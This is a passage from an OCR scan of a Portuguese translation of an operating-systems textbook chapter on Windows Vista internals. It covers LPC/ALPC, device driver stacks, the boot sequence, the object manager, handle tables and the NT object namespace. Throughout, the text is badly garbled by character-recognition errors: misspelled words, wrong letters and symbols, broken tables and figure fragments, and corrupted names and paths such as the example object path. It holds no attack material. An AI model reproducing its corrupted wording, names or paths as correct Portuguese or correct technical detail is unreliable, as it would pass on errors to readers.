a ten£ativa dc inidalizaęao do sistema, a cópia no disco e 
muito nicnos provavcl dc ser eorrompida. 

O componente LPC fornece unia comiinicaęao entre 
processos muito efidente, usada entre processos sendo 
executados no mesmo sistema. Ele e um dos transportes 
de dados usados por recursos de cha mada de procedimen- 
to remom [RFC — rema te-procedurę cal!) baseados cm pa¬ 
droes para implemcntar o estilo de computaęao diente/ 
servidor. A RFC tambcm usa pipcs nomcados e TCP/IP 
como transportes. 

A LPC foi reforęada de modo substandal no Windows 
Vista (agora ela e chamada de ALPC de LPC avanęada— 
advanced LPC) para oferccer su porte para novas funęóes na 
RPC, incluindo RFC de componentes do nucleo, como os 
drivcrs. A LPC era um componente muito importante no 
projeto odginał do NT porqnc era usada pela ca ma da de 
snbsistema para implemcntar a comiinicaęao entre as ro- 
tinas de stubs de hibliotecas que eram executadas em cada 
processo e o processo de snbsistema que implemema as fa- 
cilidades comtms a personalidade particular de um sistema 
operacional como o Win32 ou o POSIX. 

No Windows NT 4.0, muito do código relacionado a in- 
terface gra fi ca do Win 32 foi movido para o nucleo porque 
o hardware da epota nao podia oferccer o desempenho 
necessario, Esse código residia antes no prócesso de subsis- 
ferna csrss.exe que implememava as imerfaces do Win32, O 
código da GUJ baseada no nucleo reskie em um driver es- 
pedał de nucko, win32k.sys, Esperava-se que essa mudanęa 
melhorasse o desempenho do Win32, porque as transięoes 
extra de modo nucleo /modo u su ario e o custo da troca de 
cspaęos de endereęamento para implemcntar a comunica- 
ęao via LPC haviam sido eliminados. Entretanto, nao foi 
tao beni-succdido quanto esperado porque os requisitos de 
código sendo cxccutado no nucleo sao muito estritos, e o 
custo adidonal de cxceuęao no modo nucleo superou al- 
gims dos ganhos na reduęao de cuslos de troca. 

Os drivers de dispositivos 

A parte finał da Figura 11.4 comiste dos drivers de 
dispositiyos. No Windows, des sao bibliotecas dc ligaęao 
dinamica, carrcgadas pelo exccutivo do NTOS. Embora des 
sejam usados, em primeiro lugar, para implemcntar os dri- 
vcrs para bard war es cspccificos, como dispositivos ffsicos e 
barramentos de E/S, o mccanismo do driver dc disposiiivo 
tambcm ć usado como o mccanismo geral dc exiensibilida- 
de do modo nucleo. Como descrito ameriormente, a maior 
parte do subsistema do Win32 e carregada como um driver. 

O gcrcnciador dc E/S organ i za um caminho dc 0uxo 
dc dados para cada instancia dc um disposiiivo, como exi- 
bido na Figura 11.7. Essc caminho e cha mado de pil ha de 
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Pilha de dispositivos Cada objęto de dispositivo e 
consistindo nos objetos ligado a objetos de drtvers com 
de dispcsitivos para C: pontos de entrada de funęao 


Pilha de dESpositivos 
consistindo nos objetos 
de dispositivos para D: 
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Figura 11. 7 Descrięao simpltficada das pilhas de dispositivos para dois volumes de arquivos NTFS. O pacote de sofrcitaęao de E/S 
e passado abaixo pola pilha. As rotinas apropriadas dos drivers associados sao chamadas a cada nivel na pilha. As próprfas pilhas de 
dispositivos consistem de objetos de dispositivos aiocadosespecificarmente para cada pilha. 


dispo$itivos e consiste de instandas privadas de objetos 
de dispositivos do nudeo, alocados para o ca min ho. Cada 
objęto de dispositivo na pilha de dtspositivos e ligado a 
urn objęto de driver particular, que eon tętn a tabela de roti¬ 
nas a serem usadas para os pacotes de sołicitaęao de E/S que 
flueiti pela pilha dc dispositivos. Em alguns casus, os dispo- 
sitivos na pilha rep rc sen tam drivcrs cujo unico propósito e 
filtrar as opcraęoes de E/S direcionadas a urn dispo$Uivo, 
barramento mi driver de rede em panicutar. A filiragem e 
usada por urna serie de razdes, Algumas vezes o pre-proces- 
samętno ou pós-processamemo de operaęoes de E/S resulta 
em uma arp nitetura mais krupa, enquanto em out ras vezes 
e apenas pragmatico, porque as fontes ou os direitos de mo- 
dificar um driver nao estao dispomveis e a filtra gem e usada 
para contornar isso. Os fi kros tambem podem implementar 
novas fundona lida des, como transformar discos em parti- 
qocs ou varios discos em volumes RAID. 

Os sistemas de arquivos sao carregados como drivers. 
Cada instancja de um volume para um sistema de arqub 
vos tern um objęto de dispositivo criado como parte da pilha 
de dispositivos para aqttele volume. O objęto de dis posil i vo 
sera ligado ao objęto de driver para o sistema de arquivos 
apropriado a formataęao do volume. Drivers de filtro espe- 
ciais, diamados drivers de filtro do sistema de arquivos, 
podcm inserir objetos de dispositivos ames que o objęto de 
dispositivo do sistema dc arquivos apliąue fun clona lidade as 


solićiaęoesde E/S ermadas a cada vohune, assim como pro- 
curar por vfrus na leiliira ou gravaęao de dados. 

Gs protocoios de rede, como a implemeniaęao inie- 
grada do TCP/1P IPv4/IPv6 do Windows Visia r tambem sao 
carregados usando o modelu de E/S. Para ćompatibilidade 
com os antigos Windows baseados em MS-DOS, o driver de 
TCP/IP implementa um protocolo especial para falar com 
intcrfaces de rede acima do modelu de E/S do Windows, Ha 
outros drivers que tambem implementam essas medidas, 
os quais sao diamados pelo Windows de miniportas. A 
fundonalidade compa nil bada esta em um driver de clas- 
se. Por exemplo, fun clona li da des comuns para discos SCSI 
ou IDE ou dispositivos USB sao fortieddas por um driver de 
classe, ao qual os drivers de miniporta para cada tipo espe- 
cifico desses dispositivos sao ligados como uma biblioteca. 

Nao discLiliremos qualqucr ddver de dispositivo em 
particular neste cap aulo, mas apreseniaremos mais dęta- 
Ihes sobrc como o gerenciador de E/S interage com os dri- 
vers de dispositivo na Seęao 11.7. 

11.3.21 Iniciallzaęao do Windows Vista 

Fazer um sistema operacional executar requer varias 
etapas. Quando um compmador e ligado, a CPU e iniciali- 
zada pdo hardware e configurada para inicializara execu- 
ęao de um programa na memória. Com udo, o unico códi- 
go dispomvel esta em urna forma nao yolatil de memória 
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CMOS, que e inirializada pelo fabricante do computador 
(e algumas vezes atualizada pdo usuario em um processo 
cliamado flashing). Na małor parte dos PCs esse programa 
i nicią I e o BIOS (sistema basico de entrada/safda — basie 
ittpnt/output system) t que sabe como se comumcar com os 
dispositivos-padrao cncontrados em um computador, O 
BIOS inicialiża o Windows Yista carregando primeiro pc- 
ąucnos programas dc inidalizaęao (boo[strap) cncontrados 
no infcio das partięoes da umtfade de disco. 

Os programas dc inicializaęao sabem como obter infor- 
maęao sufidente dc nm volumc dc sistema dc arquivos para 
encontrar o programa autónomo do Windows BootMgr no 
dirctdrlo-raiz. O BootMgr determina sc o sistema cstava an- 
tes cm hibcrnaęao on cm modo de espera {inodos espedais 
de economia de energia que permitem ao sistema voltar a 
aiiva sem inidalizar), Se for esse o caso, o EootMgr carrega 
e exeeuta o WinResume.exe; do contrario, de carrega e exe- 
cuta o Winload.exe para realizar urna nova inicializaęao. O 
WinLoad cartcga os componentes dc inicializaęao do siste¬ 
ma para a memória; o nucleo/excculivo (nonnalmente o 
ntoskrniexe) t a HAL (haidlt), o arquivo contendo a colmcia 
SYSTEM, o driver Win32ksys contendo as paries do subsis- 
tcm.a do Win32 do modo mielec, assim como imagens dc 
quaisqiier ontros drkers listados na colmcia SYSTEM como 
clrivers de inicializaęao — significando que sao necessa- 
rios ąuando o sistema realiza urna primeira inicializaęao. 

Unia vez que os componentes dc inicializaęao do Win¬ 
dows estejam carrega dos na memória, c dado co mrok: para 
o código de baixo mvd do NTOS, que procede a imdaliza- 
ęao da HAL camadas de nucleo e executiva, a ligaęao nas 
imagens de drivers e o acesso/atualizaęao de dados de con- 
figuraęao na colmeia SYSTEM, Após todos os componentes 
do modo nucleo serem inicializados, o primeiro processo do 
modo usuario e triado usando para executar o programa 
smssxxe (que se parece com o tetc/init nos sistemas UNIX), 

Os programas de inicializaęao do Windows tem logi ca 
para lidar com os próbie mas comuns que o usuario encon- 
tra quando a inicializaęao do sistema fallia, Algumas ve- 
zes a instalaęao dc um driver de dispositivo com ddeito, 
on a exccuęao dc um programa como o regedił (qne pode 
corromper a colmeia SYSTEM), impede o sistema de rea¬ 
lizar uma inicializaęao normaI, Ha suponc para ignorar 
mudanęas re cent es e realizar a inicializaęao para a ultima 
mnfiguraędo se§ura do sistema. Out ras opęoes de inicializa¬ 
ęao incluem a inicializaęao segura, quc desliga muitos dos 
drivers opdonais, e o console de recuperaęao, que dispara 
urna janela de linha de com and o cmd.exe, proporcionando 
uma experienda similar ao modo usuario unico do UNIX. 

Outro próbie ma comum para os usuarios tem sido que, 
de forma ocasional, alguns sistemas do Windows possuem 
co mp o rumem os estranhos, com falhas freąuentes (apa- 
rentcmcnte aleatórias), tamo no sistema como tias a pika- 
ęóes. Dados obtidos pelo programa de Analise de Falhas 
On-line da Microsoft forneceram evidencias de qtte muitas 
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dessas falhas se deviam a memória ffsica defeituosa; logo, o 
processo de inicializaęao do Windows Vista oferece a opęao 
de execntar um diagnóstico extenso de memória. Talvez 
no futuro os hardwares dc computador suportem de modo 
comum o ECC (ou talvez paridade) para memória, mas a 
maiotia dos sistemas de PCs desktop c notebooks dc liojc 
esta vulncravel ate aos erros de um unico bit cm mcio aos 
bilhoes de btls de memória que eontem. 

11.3.31 A implementaęao do gerenciador 
de objetos 

O gerenciador dc obje los ć talvez o componenic mais 
imponanic no cxccuiivo do Windows, o quc ć a causa deja 
termos introduzido muitos de seus eon cc i t os. Como descri- 
to atues, ele fornece uma i n ter face consistente e uniforme 
para gerendar os recursos de sistema c estruuiras dc dados, 
como abrir arqnivos, pmcessos, threads, seęóes de niemo- 
ria, lemporlzadorcs, dispositivos, drivers e semaforos. Ate 
os objetos mais especializados, representando coisas como 
as transaęóes de nucleo, perfls, lokens de seguranęa e areas 
de irabalho do Win32, sao gerendados pelo gerenciador de 
objetos. Os objetos de disposiiivos irncrligam as descrięóes 
do sistema de E/S, incluindo a oferta de ligaęao entre o es- 
paęo de noirtes do NT e os vo).umes do sistema de arquivos, 
O gerenciador de eon figura ęao usa um objęto do Lipo Cha- 
ve para sc ligar as co)melas do registro. O próprio geren¬ 
ciador de objetos tętn objetos que ele utiliza para gerendar 
o espaęo de nornes do NT e impfementa os objetos usando 
um recurso comum. Eies sao objetos dc diretório, ligaęao 
sini ból i ca, e do tipo objęto. 

A uniformtdade ofereeida pelo gerenciador de objetos 
tem muitas facetas. Todos esses objetos usarn o mesmo rnc- 
canistno para como sao criados, destrutdos e contabilizados 
no sistema de co las; todos podem ser acessados por pro- 
ccssos do modo usuario usando descritores. Ha uma con- 
venęao unificada para o gerenciamenlo de rcfcrencias de 
pontdros para objetos a parlir do nucleo; os objetos podem 
ser nomeados no espaęo de nomes do NT (que e geren- 
ciado pdo gerenciador de objetos); objetos despachantes 
(quc comeęam com a estru tura comu m de sinalizaęao de 
cventos) podem usar imerfaces comuns de sincronizaęao 
e no ii Fica ęao, como WailForMuitipleObjects; ha o sistema de 
seguranęa comum com ACLs impostas aos objetos abertos 
pelo norne e verificaęoes de acesso a ca da uso de um descri- 
tor; e ale recursos para aj u dar os deseń volvedores do modo 
nucleo a resoker probletnas traęando o uso de objetos. 

O pdndpal para entender os objetos e perccber quc 
um objęto (do executivo) e apenas uma estrutura dc dados 
na memória vinua) acessfvd para o modo nucleo. Essas 
estruluras de dados sao, de modogeral, usadas para repre- 
seniar conceitos mais abstratos. Como exemplos, objetos 
de arquivos do executivo sao criados para cada instanda dc 
um arquivo de sistema de arqutvos que Toi aberto, e objetos 
dc processo sao criados para representar cada processo. 






Sn#w 


524 Sistemas operacionais modem os 


Uma consequenda do fato de que os objetos sao ape- 
nas estruturas de dados do modo nucleo e que, quando o 
sistema reinicializa (ou falha), todos os objetos sao perdi- 
dos, puando acontece a [niriaLizaęao do sistema, nao ha 
objetos presentes, nem mesmo os descritores dc tipos de 
objetos, Todos os tipos dc objetos, e os próprios objetos, dc- 
vcm ser criados dc forma dinamica por outros componen- 
fes da camada executiva chamando as iiiterfaces oferecidas 
pdo gerenciador de objetos, Quando os objetos sao criados 
e nomcados eon formę a especificaęao, des podetn depois 
ser refereiidados pdo espaęo de nomes do NT. Logo, cons- 
imir os objetos na imdalizaęao do sistema tambem consirói 
o espaęo de nomes do NT. 

Os objetos tem uma estrutura, exibida na Figura 11 
Gada um contem um cabeęalho com certas informaędes eo- 
muns a todos os objetos de todos os tipos. Os campos nesse 
cabeęalho induem o nonie do objęto, o diretório em que ele 
reskie no espaęo de nomes do NT e um ponteiro para um 
descritor de seguranęa representando a ACL para o objęto. 

A memória aloeada para os objetos vcm de um dos 
dois hcaps (ou tanąucs) dc memória mantidos pda camada 
executiva. Ha funęócs utililarias (parecidas com as de alo- 
eaęao de memória) no exeeutivo que permitem aos compo- 
nentes do modo nucleo aloear tamo a memória pagina vel 
de nucleo quanto a nao paginavel. A memória nao pagina- 
vel e necessaria para qualquer estrutura de dados ou objęto 
do modo nucleo que precise ser acessado por um mvel 2 de 
prioridade de CPU ou maior. Isso indiii ISRs e DPCs (mas 
nao APCs) e o próprio escalonador dc threads. O descritor 
dc falta dc pagina tambem prccisa quc suas estruturas de 
dados sejam alocadas de memória nao paginavd dc nucleo 
para cvitar recursao. 

A maior parte das alocaęoes com origem no gerenda- 
dor de heaps do nucleo e atingkia usando listas rapklas, 
que contem listas LIFO de alocaęoes do mesmo tamanho, 


para cada processador. Hssas LIFOs sao otimizadas para 
operaęao livre de bloqueios, aumentando o desempenho e 
a escalabilidade do sistema. 

Cada cabeęalho dc objęto contem um campo de en- 
cargo de co ta, que e o custo cobrado ao processo para a 
abertura daquele objęto. As cotas sao usadas para impedir 
que um usuario milize muitos recursos do sistema. Ha linii- 
tes separados para memória nao paginavel de nucleo (que 
requer a aiocaęao tanto de memória ffsica como de ende- 
reęos virtuais do nucleo) e memória paginavel de nucleo 
(que utiliza endereęos virtuais do nucleo): quando o custo 
acumulado para qualqucr dos tipos dc memória atinge o 
limite dc cota, as alocaęoes do processo falham cm razao 
da insuficićnda dc recursos, As cotas tambem sao usadas 
pelo gerenciador de memória, para con trolar o la man ilo do 
eonjiinto dc irabalho, e pelo gerenciador de threads, para 
liniitar a frequencia de uso da CPU. 

Tanto a memória ffsica ąuanto os endereęos virtuais 
do nucleo sao recursos valiosos. Quando um objeto nao 
c mais lic cc ss ario, clc dcvc ser rcmovido c sua memória c 
endereęos devolvidos ao sistema, mas, sc um objeto c rci- 
yindicado enquanto ainda esta em uso, a memória pode ser 
aloeada para urn novo objeto, e en tao e provavel quc as es¬ 
tru tu ras de dados sejam corrompidas. Isso e facil de ocorrer 
na camada executiva do Windows porqtte ela e altamente 
mukithread, e implementa varias operaędes assmeronas 
(funęoes que retornam a o chamador antes de terminar o 
servięo nas estruturas de dados que recebem). 

Para evitar a liberaęao prematura de objetos em de- 
correncia de condięóes de corrida, o gerenciador de objetos 
implementa um mecanismo de comagem de referenda e o 
conceiio de ponteiro referendach), que e necessario para 
acessar um objeto sempre que ele estiver sob risco de ser 
deletado. Dependendo das comenędes acerca de cada tipo 
particular de objeto, ha apenas alguns momentos espeafi- 
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I Figura 11.8 A estrutura de um objeto do executivo gerencśado pel o gerenciador de objetos. 
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cos em que um objęto pode ser deletado por outro thread; 
em ouiros moment os, a utUizaęao de bloqueios, dependen- 
cias entre esiruturas de dados e ate o faro de nenhum outro 
thread ter um pontciro para um objęto sao suficientcs para 
impcdir que o objęto scja deletado dc forma prematura. 

Manipuladores (handles) 

As rcfcrencias do modo usuario para objetos do modo 
niicleo na o podem utilizar-se de pónldros, pois des sao 
muilo diffceis de validar. Em vez disso, os objetos do modo 
niicleo devem ser nomeados de alguma oiura forma para 
que o código de usuario possa fazer referencias a eles. O 
Windows usa manipuladores para fazer referenda a ob¬ 
jetos do modo mideo* Eles sao va!ores opacos convertidos 
pelo gerenciador de objetos em referencias a estru tu ras de 
dados especfficas do modo niicleo que represmtam um 
objęto, A Figura 11.9 apresema a estrutura de dados da 
tabela de manipuladores osada para traduzir os manipula¬ 
dores em ponleiros de objetos. A tabela de manipuladores 
e expansivel por meio da adięao de camadas extras de in- 
direęao. Cada processo tern sua própria tabela, incluindoo 
processo de sistema que conteni os threads do niicleo na o 
assodados a um processo do modo usuario. 

A Figura 11.10 apresenta urna tabela de manipuladores 
com duas camadas exlras de indireęao, o maximo suportado. 
Em alguns ca sos, e convcnicnte que o código em exccuęao 
no modo niicleo seja capaz de usar manipuladores no lugar 
de pomdros referendados. Esses sao chamados mampula- 
dores do mideo e sao codificados de maneira especial para 
qne possani ser diferenciados dos manipuladores do modo 
usuario* Eles sao mantidos nas tabelas de manipuladores 
dos processos de sistema e na o podem ser acessados pelo 
modo usuario, Assim como a maior parte do espaęo de en- 
dereęamento virtual do mideo 6 com partii ha da por todos os 
processos, a tabela de manipuladores do sistema e comparti- 
lhada por todos os componentes do mielec, nao importando 
qua) seja o aittal processo do modo usuario. 

Os usuarios podem criar novos objetos ou abrit aquc- 
les ja existentes fazendo chamadas do Win32 como a 
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Tabela d e 

manipuladores A: Itens da tabela de manipuladores fSI 2] 



Figura 11.9 Estrutura de dados de urna tabela de descritores 
minima usando urna unica pagina para ate 512 descritores, 

CreateSemapbore ou OpenSemaphore, que sao chamadas para 
procedimemos dc biblioteca que, no firn das contas, resul- 
tam na realizaęao da cha ma da de sistema apropriada* O 
resultado de qualquer chamada bem-sucedida que cria ou 
abre um objęto e um item de tabela de descritores, com 
64 bits, quc e gravado na tabela privada de descritores do 
processo na memória do niicleo. O mdice, com 32 bits, da 
posi^ao lógica do dcscritor na tabela e ret orna do a o usua¬ 
rio para ser usado em chamadas posteriores. A entrada na 
tabela de descritores, com 64 bits, no mideo contcm duas 
pa la v ras de 32 bils* Unia conteni um ponleiro com 29 bits 
para o cabcęalho do objęto; os outros 3 bits sao usados como 
flags (por exemplo, se o descritor e herdado pelos processos 
que ele cria) e sao desmascarados a mes de o pomeiro ser 
seguido. A outra palavra contem u ma mascara de direitos 
com 32 bits, que e neeessaria porque a verificaęao de per- 
missoes e feita apenas no momento em que o objęto e cria- 
do ou aberto. Se um processo so tern permissao de leitura 
para um objęto, todos os outros bits na mascara sera o 0, 
permitindo ao sistema opcracional rejeitar qualqucr outra 
opera ęao no objęto a leni dc leitura. 

O espaęo de nomes do objęto 

Os processos podem compartilhar objetos duplieando 
um mairipulador para o objęto nos outros processos, mas 
isso requer que o processo que esteja duplieando lenha 
manipuladores de outros processos, o que e impraltcavd 
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HM 


B: Ponteinos da tabela de manipuladores [1024] 


A: itens da tabela de manipuladores 1512] 


Obj 


pi 


eto 


Objęto 


Objęto 


E: Ponteiros da tabela de manipuladores [1024] 

MMMT 


F: Itens da tabela de manipuladores [512] 


n 


C: Itens da tabela de manipuladores [512] 


1 Figura 11.10 Estrutura de dados de urna tabela mśxima de atd 16 milhóes de descritores, 
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em muitas sima ęoes, como quando os processos que es- 
lejam compartilhando um objęto nao sao relocionados ou 
quando sao proiegidos uns dos outros. Em outros casos, e 
importante que os objetos persistam mesmo ąuando nao 
estao scndo usados por nenhum processo, como objetos 
de disposHWas represemando dispositivos fisteos, ou vo- 
Ilimes montados, ou os objetos usados para implemeniar 
o próprio gerenciador de objetos no espaęo de nomes do 
NT. Para resolver o companilhamento geral e os reąuisitos 
de persistencia, o gerenciador de objetos pemiite a obje¬ 
tos arbitrarios serem nomeados no espaęo de nomes do NT 
ąuando sao criados. Entretanto, e responsabilidade do com- 
ponente do executivo, que mani pula objetos de tipos par- 
ticulares, fomecer as interfaces que dao suporte ao uso das 
facilidades de nomeaęao do gerendador de objetos, 

O espaęo de nomes do NT e hierarquito, com o geren¬ 
dador de objetos implementando diretórios e Liga ęoes sim- 
bólicas. O espaęo de nomes tambem e extensivel, permttin- 
do que qiialquer lipo de objęto espedfique extensóes para 
cle, fornecendo urna rotina cha mada Parse. A rotina Parse 
e um dos procedimentos quc podcm ser fomeddos para 
cada objęto cm sua criaęao, como cxibido na Tabela 1 L10. 

O procedimento Open e pouco usado porque o com- 
portamento-padrao do gerendador de objetos e, de manei- 
ra usual, o necessario; logo, esse procedimento ć espedlica- 
do como NULL para quase todos os tipos de objęto. 

Os procedimentos Close e Delete represemam diferentes 
es ta dos ca usados no objęto. Quando o ultimo manipulador 
para um objęto e focha do, pode havcraęóes necessarias para 
li ni par o esiado, que sao realizadas pclo procedimento 
Cbse, Quando a ultima referenda de ponteiro e removida 
do objęto, o procedimento Delete e cha mado para que o 
objęto possa ser preparado para ser deletado e su a mc- 
mória seja reutilizada. Com objetos de arquivo, os dois 
procedimentos sao implementados como retorno de cha- 
madas para o gerendador de E/S, que e o componentc 
qtie dedarou o lipo do objęto de arquivo. As opcraęoes 
do gerendador de objetos rcsuliam cm correspondcr ope¬ 
ra ęoes de E/S quc sao eimadas peia pi Ilia de dispositivos 
assodada ao objęto de arquivo, e o sisicma de arquivos faz 
a maior parte do trąb alb o, 


O procedimento Parse e usado para abrir ou criar ob¬ 
jęłoś, como arquivos e chaves de registro, que estendem o 
espaęo de nomes do NT. Quando o gerendador de objetos 
esta tentando abrir um objęto pelo nonie e encontra um 
nó folha na parte do espaęo dc nomes quc gercncta, dc 
vcrifica sc o tipo do objęto nó folha tem um procedimento 
Parse cspccificado; sc rivcr, de invoca o procedimento, pas- 
sando quałquer parte nao usada do caminho, Usando mais 
urna vez os objetos de arquivo como exeniplo, o nó folha 
e um objęto de dispositwo represemando um volume de 
sistema de arquivos em particular. O procedimento Parse e 
implementado pelo gerenciador de E/S e resulta em utną 
operaęao de E/S para o sistema de arquivos para preencher 
um objęto de arquivo em referenda a unia instancia aberta 
do arquivo ao qual o caminho se rcfcrc no volumc. Ex- 
ploraremos passo a passo esse cxemplo particular a seguir. 

O procedimento QueryName e usado para proeurar o 
nonie assoeiado a um objęto. O procedimento Security e 
usado para obter, coiifigurar ou apagar as descrięoes de se- 
guranęa em um objęto. Para a maioria dos tipos de objetos 
esse procedimento e fomeddo como ponto de emrada pa- 
drao ao componentc do Monitor de Referenda de Segu- 
ranęa do executivo. 

Notę que os procedimentos na Tabela 11.10 nao rea- 
lizam as opera ęoes mais interessames para cada tipo de 
objęto. Em vez disso, eles fornecem funęoes de retomo 
de que o gerendador de objetos precisa para implemen- 
tar, de maneira correta, as funęoes como oferccer acesso 
a objetos e limpar os objetos ąnando terminar com eles, 
Alem dessas funęoes dc retorno, o gerenciador de objetos 
tambem fomccc um conjunto dc rotinas gcnericas de ob¬ 
jęto para opcraęoes como criar objetos c tipos dc objetos, 
duplicar descritores, obter um ponteiro referenciado de um 
descritor ou um nonie c adicionar e subtrair comagens dc 
referenda para o cabeęalho do objęto. 

As opera ęoes interessantes nos objetos sao as cha ma das 
de sistema da APi nativas do NT, como as exibidas na Tabela 
11 ,6, como NtCreatePnocess, NtCreateRle ou NtCIose (a funęao 
generica que termlna todos os tipos de descritores). 

Ainda que o espaęo de nomes do objęto seja crucial 
para a operaęao inteira do sistema, po u ca s pessoas saliem 


Procedimento 

Ouando 6 cha mado 

Nolas 

Opon 

Para cada novo manipulador 

Usado raramente 

Parse 

Para tipos de objęto que estendem o espaęo de nomes 

Usado para arquivos e chaves de registro 

Ctose 

No ultimo fechamanto do manipufador 

Limpa os efeitos adversos vistveis 

Delete 

Na remogao da ultima referenda de ponteiro 

0 objęto esta para ser deletado 

Security 

Obter ou configurar o identificador de seguraęa 

Proteęao 

GuetyName 

Obter o nome do objęto 

Raramente usado fora do nucleo 


Tabela 11,10 Procedimentos de objęto fomeddos na espedficaę&o de um novo tipo de objęto. 
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que ele exisie porque nao e visivel para os usuarios sem 
ferramentas espedais de visualizaęao. Uma dessas ferra- 
memas e a winobj, disponwel gratuitamente em <www. 
microsoft.com f\ echnet/sysinternals>. Quando exeeuiada, 
cssa ferramenta cxibe um cspaęo de nomes de um objęto 
quc, dc modo tipico, contcm os dirctóńos dc objcto łistados 
na Tabela 11*11, bem como alguns outros* 

O est ran ha men te nomeado diretório \?? contem a 
identifkaęao de todos os nomes de dispositivos do estilo 
do MS-DOS, como A: para disco removivel e C: para o pri- 
meiro disco ngido. Esses nomes sao r na verdade, ligaęoes 
simbólicas para o diretório \Device, ondc os objetos dc dis- 
positivo residem* O nomc \?? foi cscolhido para lorna-lo 
primciro cm ordem alfabćtica, assim como foi acdcrar a 
pesąuisa de todos os nomes de caminho comcęando com 
uma ktra de unidade* Os comeudos dos outros diretdrios 
de objetos devem ser autoexplicativos. 

Como descrito anteriormente, o gerenciador dc obje¬ 
tos mantem uma contagcm dc manipuladorcs separada cm 
cada objcto* Essa contagcm nimca ć maior quc a contagcm 
dc pontciros referenciados porąuc cada nianipulador vali- 
do tem um ponteiro referenciado para o objęto em sua en- 
trada na tabela de manipuladorcs. A razao para a contagcm 
separada de manipuladores e que muitos tipos de objetos 
podem precisar ter sens estados limpos quando a ultima re¬ 
ferenda do modo usuario desaparece, mesmo que eles nao 
estejam prontos para ter sua memória deleiada. 

Om exemplo sao os objetos de arquivo, que represen- 
tatn uma instancia de um arquivo a be no. No Windows, os 
arquivo$ podem ser abertos para acesso exclusivo; quan- 
do o ultimo manipulador para um objęto de arquivo e 
lechado, e importante apagar o acesso exdusivo naquele 
momento em vez de esperar pelo siibito desaparccimento 
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de qualquer referenda acidemal do nucleo (por exempIo f 
depois da ultima descarga de dados da memória). De outra 
forma, fediar e reabrir um arquivo a partir do modo usua- 
rio pode nao funcionar como esperado porque o arquivo 
continua pareccndo estar cm uso. 

Ainda que o gerenciador de objetos tenIta rnecams- 
mos abrangemes para gerenciar o tempo de vida dos ob¬ 
jetos no inicłeo, nem as APIs do NT ou as APIs do Win32 
oferecem um mecanismo de referenda para lidar com a 
utilizaęao de mukiplos threads concorrentes no modo 
usuario* Dcssa forma, niuitas aplicaęoes multithread tem 
condięócs de corrida c erros qttando vao fechar um des- 
critor cm um thread scm ter terminado com clc cm outro, 
fechar um dcscritor varias vczcs ou fechar um dcscritor 
quc omro thread ainda esta u san do e reabri-lo para refc- 
renciar um objęto difereme, 

Talvez as APIs do Windows devessem ter sido projeta- 
das para soiicitar uma API de fechamento para cada objęto 
cm vcz dc uma dnica opcraęao generka, NtCiose* isso te- 
ria ao menos reduzido a lrequenria dc erros causa dos por 
threads do modo usuario Fechando os descritores errados, 
Outra soluęao podia ser embutir um campo de seąttenda 
em cada descritor alem do mdice na tabela de descritores. 

Para ajudar os deseń volvedores de aplicaęoes a encon- 
trar próbie mas como esses cm sens próg ta mas, o Windows 
tem um verificador de aplicaęoes que os descnvolvedorcs 
de software podem baixar da Microsoft* De maneira sirni- 
lar ao verifkador para drivers que descreveremos na Seęao 
1 1.7, o yerificador de aplicaęoes faz uma extensa checagem 
de regras para ajudar os programadores a encontrar erros 
que podem nao ser encomrados eni lestes usuais. Ele tam- 
bem pode ativar uma ordenaęao FIFO para a lista de mani¬ 
puladores Iivres, de modo que esses nao sejam reutilizados 


Diretório 

Conteudo 

?? 

Ponto de partida da pesquisa de dispositivos MS-DOS como C: 

DosDevices 

No me oficial do ??, mas na vercfade só uma figaęao simbófica para ?? 

Device 

Todos os dispositivos descoberios de E/S 

Driver 

Objetos conrespondentes a cada driver de dispositivo carregado 

ObjectTypes 

Os tipos de objetos como os łistados na Figura 11.11 

Windows 

Objetos de erwto de mensagens para todas as janelas de GUI do Win32 

BaseNamedGbjects 

Objetos do Win32 criados pelo usuario como semaloros, mutexes etc. 

Aręname 

Nomes de partigoes descobertas pelo carregador de inicfalizaęao 

NLS 

Objetos de Su porte de Linguagem Nacional 

Fi leSy stem 

Objetos de dnver de sistema de arquivo$ e objetos reconhecedores do sistema de arquivos 

Security 

Objetos pertencentes ao sistema de seguranęa 

KnownDLLs 

Bibliotecas compartilhadas principais que sao abertas cedo e mantidas abertas 


I Tabela 11.11 Alguns diretórios tipicos no espago de nomes do objęto, 
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de maneira imediata (ou seja, desativa a ordenaęao LIFO de 
mellior desempenho que e normalnienie usada para tabe- 
las de manipuladores). Impedir que os manipuladores sejam 
reutUizados de fomia rapida Iransforina as situaęoes em que 
uma opcraęao tisa o manipulador crrado na nnlizaęao dc 
urn manipulador fechado, que ć mais faeil dc detcctar. 

O objęto de dispositiyo e um dos mais import a mes e 
yersateis objetos do modo nucleo no executivo. O tipo e 
especifkado pelo gerendador de E/S, que, junto com os dri- 
vers de dispositivos, sao os usuarios prindpais dos objetos 
de dispositivos. Os objetos de dispositivos sao reladonados 
com os drivers de forma fntima, c cada objęto de dispositiyo 
tern, de modo gcral, uma ligaęao para um objęto de driver 
esperffko, que de serc ve como accssar as rotinas de proces- 
samcu to de E/S para o driver correspondcnte do disposilivo, 

Objetos de dispositivos representam dispositivos de 
hardware, interfaces e barta men los, bem como partięóes 
iógicas dc disco, volumes dc disco e ate sistemas dc arqui- 
vos c cxtensoes dc nucleo como filtros antivirus. Muitos 
drivcrs de dispositivos sao nomcados, para quc possani ser 
acessados sem ter de abrir dcscritorcs para instancias dos 
disposhtyos, como no IMIX< Usaremos objetos dc dispo- 
sitivos para ilustrar como o proced imentu Farsę ć usado, 
conforme exibido na Figura 11.11; 

1. Quando um jcopponenie do exeauiva como o ge¬ 
renciador de E/S implementamlo a chamada nativa 
de sistema NtCreateFile, chamada ObOpenObjectByName 
no gerendador de objetos, ele passa um nome de 
caminho Unicode para o espaęo de endereęamento 
do NT, dtgamos \?7\C:\foo\bnr. 

2 . O gerendador de objetos procura nos direlórios e 
Iigaęoes simbólicas e, por firn, descobre que V?P\G se 
refere a um objęto de dispositiyo (uin tipo definkio 
pdo gerenciador de E/$} + O objęto de dispositiyo e 


um nó folha na parte no espaęo de nomes do NT 
gerenciada pelo gerendador de objetos. 

3. O gerenciador de objetos chama, entao, o procedi- 
mento Farsę para esse lipo dc objęto, que acontece 
de ser o lopParseDevice implementado pelo geren¬ 
dador de E/S. Ele nao passa apenas um ponteiro 
para o objęto dc dispositiyo que cncontrou (para 
O), mas tamhem a cadeia dc caractcres rernanes- 
cente ybeUw. 

4. 0 gerendador de E/S vai criar um IRP [pacote de 
solicitaęao de E/S — I/O reqaestpacket), alocar um 
objęto de arquivo e enviar a solicitaęao para a pilha 
de dispositivos de E/S determinada pelo objęto de 
